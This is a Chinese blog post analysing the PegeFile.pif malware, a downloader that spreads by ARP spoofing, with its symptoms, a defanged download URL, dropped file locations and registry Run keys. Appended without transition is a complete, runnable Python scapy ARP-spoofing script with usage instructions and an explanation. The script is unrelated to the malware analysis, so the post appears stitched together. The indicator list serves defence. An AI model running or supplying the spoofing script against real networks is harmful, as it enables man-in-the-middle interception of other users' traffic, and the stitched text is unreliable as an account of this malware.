强悍的PegeFile.pif(下载者+ARP欺骗)分析

本文描述了一种中毒后的现象,包括下载大量木马、ARP欺骗等,并详细列出了病毒产生的特征文件及其在系统中的分布位置,同时给出了受影响的注册表项。
中毒后的现象:
1)下载N多木马,
2)ARP欺骗了,局域网内的其他电脑上网时,都会先访问hxxp://www.369678.cn/ppp.html,下载病毒。

隐藏的有点诡异,
产生的文件:
1) 每个磁盘分区下都有这两个文件:
    autorun.inf
    PegeFile.pif
2) 其他文件
c:/windows/
   TIMHost.exe
   NVDispDrv.exe
c:/windows/system32/
   TIMHost.dll
   NVDispDrv.dll
   visin.exe
   ztkini.dll
   jzfini.dll
   xyfini.dll
   zxgini.dll
c:/windows/system32/drivers/
   scvhost.exe
   svchost.exe
C:/Program Files/Internet Explorer/PLUGINS/
   NewTemp.bak
   NewTemp.bbk
   NewTemp.dl
   System64.Jmp
   System64.Sys
C:/Documents and Settings/Administor/Local Settings/Temp/
   1.exe
   2.exe
   ...
   15.exe
   rxso.exe
   rxso0.dll
   tlso.exe
   tlso0.dll
   qjso.exe
   qjso0.dll
   daso.exe
   daso0.dll
   wlso.exe
   wlso0.dll
   wgso.exe
   wgso0.dll

还有注册表部分:
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
    KVP
    NVDispDrv
    qjsa
    rxsa
    TIMHost
    tlsa
    wdsa
    wgsa
    wlsa 
以下是一个较为完整的Python实现ARP欺骗的代码,包含ARP欺骗和恢复ARP表的功能: ```python import sys import time from scapy.all import ARP, Ether, srp, sendp def get_mac(ip): # 创建一个ARP请求包 arp = ARP(pdst=ip) # 创建一个以太网帧 ether = Ether(dst="ff:ff:ff:ff:ff:ff") # 组合以太网帧和ARP请求包 packet = ether / arp # 发送数据包并接收响应 result = srp(packet, timeout=3, verbose=0)[0] if result: return result[0][1].hwsrc else: return None def arp_spoof(target_ip, spoof_ip): target_mac = get_mac(target_ip) if target_mac is None: print(f"无法获取 {target_ip} 的MAC地址。") return # 创建ARP欺骗数据包 arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=spoof_ip, op=2) # 发送ARP欺骗数据包 sendp(arp_response, verbose=0) def restore_arp(target_ip, source_ip): target_mac = get_mac(target_ip) source_mac = get_mac(source_ip) if target_mac is None or source_mac is None: print("无法获取MAC地址,无法恢复ARP表。") return # 创建恢复ARP表的数据包 arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=source_ip, hwsrc=source_mac, op=2) # 发送恢复ARP表的数据包 sendp(arp_response, verbose=0) if __name__ == "__main__": if len(sys.argv) != 3: print("用法: python arp_spoof.py <目标IP> <伪装IP>") sys.exit() target_ip = sys.argv[1] spoof_ip = sys.argv[2] try: sent_packets_count = 0 while True: arp_spoof(target_ip, spoof_ip) arp_spoof(spoof_ip, target_ip) sent_packets_count = sent_packets_count + 2 print(f"\r[+] 已发送的数据包: {str(sent_packets_count)}", end="") time.sleep(2) except KeyboardInterrupt: print("\n[-] 检测到 Ctrl+C ,正在恢复ARP...") restore_arp(target_ip, spoof_ip) restore_arp(spoof_ip, target_ip) print("ARP表已恢复。") ``` ### 代码解释 1. **`get_mac` 函数**:用于获取指定IP地址对应的MAC地址。通过发送ARP请求包并接收响应来获取MAC地址。 2. **`arp_spoof` 函数**:构造ARP欺骗数据包并发送,将目标主机的ARP表项修改为攻击者的MAC地址。 3. **`restore_arp` 函数**:构造恢复ARP表的数据包并发送,将目标主机的ARP表项恢复为正确的MAC地址。 4. **主程序**:通过命令行参数获取目标IP和伪装IP,循环发送ARP欺骗数据包,直到用户按下 `Ctrl+C` ,然后恢复ARP表。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值